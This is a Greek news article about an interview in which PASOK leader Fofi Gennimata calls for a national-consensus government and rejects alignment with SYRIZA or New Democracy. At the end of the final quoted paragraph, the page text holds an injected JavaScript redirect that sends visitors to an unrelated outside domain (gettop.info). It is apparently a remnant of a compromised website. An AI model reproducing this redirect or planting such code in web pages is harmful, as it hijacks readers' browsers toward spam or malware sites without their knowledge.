Γεννηματά: Έξοδος από την κρίση με ισχυρή κυβέρνηση Εθνικής Συνεννόησης

0
5

 

Υπέρ μιας ισχυρής κυβέρνησης Εθνικής Συνεννόησης τάσσεται η πρόεδρος του ΠΑΣΟΚ Φώφη Γεννηματά σε συνέντευξή της στην εφημερίδα «Αγορά».

H κυρία Γεννηματά διαψεύδει τα δημοσιεύματα περί σύγκλισης με τον ΣΥΡΙΖΑ ενώ χαρακτηρίζει σημαντική την επίσκεψη Ομπάμα. Επιπλέον, αναφέρει πως είναι μια βαθιά συντηρητική επιλογή η εκλογή του Ντόναλντ Τραμπ.

Για τα εσωκομματικά του ΠΑΣΟΚ και την κριτική του κ. Βενιζέλου αναφέρει πως δεν δείχνει σε κανέναν την έξοδο.

«Η κυβέρνηση αυτή δεν μπορεί. Όσο πιο γρήγορα φύγει τόσο το καλύτερο. Είμαστε οι πρώτοι που από το βήμα της Βουλής είπαμε «δεν μπορείτε , παραιτηθείτε». Η χώρα χρειάζεται αλλαγή κυβέρνησης και αλλαγή πολιτικής. Τις εκλογές δεν μπορούμε εμείς να τις επιβάλλουμε, όμως αργά η γρήγορα θα οδηγηθούμε σ’ αυτές. Πάντως έχει αποδειχθεί ότι όλα αυτά τα χρόνια της κρίσης, οι αλλεπάλληλες εκλογικές αναμετρήσεις δεν έδωσαν λύση στο πρόβλημα της χώρας» αναφέρει η κ. Γεννηματά.

«Υπάρχει η πολιτική μας απόφασή να είμαστε ο αυτόνομος πολιτικός φορέας της Κεντροαριστεράς που διεκδικεί να συμβάλλει καθοριστικά στη διαμόρφωση της εθνικής γραμμής για μια προοδευτική πρόταση διακυβέρνησης του τόπου» αναφέρει, επισημαίνοντας πως «η χώρα χρειάζεται μια ισχυρή κυβέρνηση Εθνικής Συνεννόησης με ευρύτατη κοινοβουλευτική πλειοψηφία που θα οδηγήσει στην έξοδο από την κρίση και τα μνημόνια».

«Η στρατηγική επιλογή μας για αυτόνομη πορεία με διακριτό ρόλο ενοχλεί. Δεν γίναμε συμπλήρωμα του ΣΥΡΙΖΑ, δεν θα γίνουμε ούτε της Νέας Δημοκρατίας. Η θέση μας δεν αλλάζει«, ανέφερε η πρόεδρος του ΠΑΣΟΚ όταν κλήθηκε να σχολιάσει τα περί σύγκλισης με τον ΣΥΡΙΖΑ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here